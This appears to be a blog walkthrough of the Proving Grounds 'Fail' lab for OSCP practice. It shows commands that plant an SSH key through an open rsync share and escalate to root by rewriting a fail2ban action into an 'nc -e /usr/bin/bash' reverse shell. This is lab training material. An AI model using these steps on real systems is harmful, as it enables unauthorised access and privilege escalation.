Proving grounds:Fail

Today we will take a look at Proving grounds: Fail. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open rsync (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└─# rsync -rdt rsync://
fox fox home

#Now lets try to enumerate “fox”

─# nc -nv 873
(UNKNOWN) [] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
└─# mkdir rsync-share└─# cd rsync-share└─# rsync -av fox@ .
receiving incremental file list
.bash_history -> /dev/null
└─# mkdir .ssh└─# ssh-keygen -t rsa -N '' -f /root/.ssh/id_rsa
Generating public/private rsa key pair.
Created directory '/root/.ssh'.
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/
The key fingerprint is:
SHA256:kWwevUNAVqc1ZGmxzuHcDRmFxDQBJjO5Xccoowazrcg root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .+.=oXB**.|
| oo+.X=o=+o|
| *=+=o+o. |
| o.+=*.o o |
| . .Soo = . .|
| E . . |
| |
| |
| |
└─# cp ~/.ssh/ .ssh/authorized_keys┌──(root㉿kali)-[~/ctf/rsync-share]
└─# ls -la .ssh
total 12
drwxr-xr-x 2 root root 4096 Oct 30 07:24 .
drwxr-xr-x 3 kali 1001 4096 Oct 30 07:23 ..
-rw-r--r-- 1 root root 563 Oct 30 07:24 authorized_keys
└─# rsync -avp rsync-share/ fox@
sending incremental file list
sent 846 bytes received 46 bytes 356.80 bytes/sec


└─# ssh -i /root/.ssh/id_rsa fox@ GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami


Enter wrong a few times.

fox@fail:/etc/fail2ban/action.d$ cat iptables-multiport.confactionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>Add the malicious codefox@fail:/etc/fail2ban/action.d$ cat iptables-multiport.confactionban = nc 4242 -e /usr/bin/bashListen┌──(root㉿kali)-[~/ctf]
└─# nc -nvlp 4242

Enter wrong a few times.

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”



Al1z4deh:~# echo "eJPT, CEH, OSCP"

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store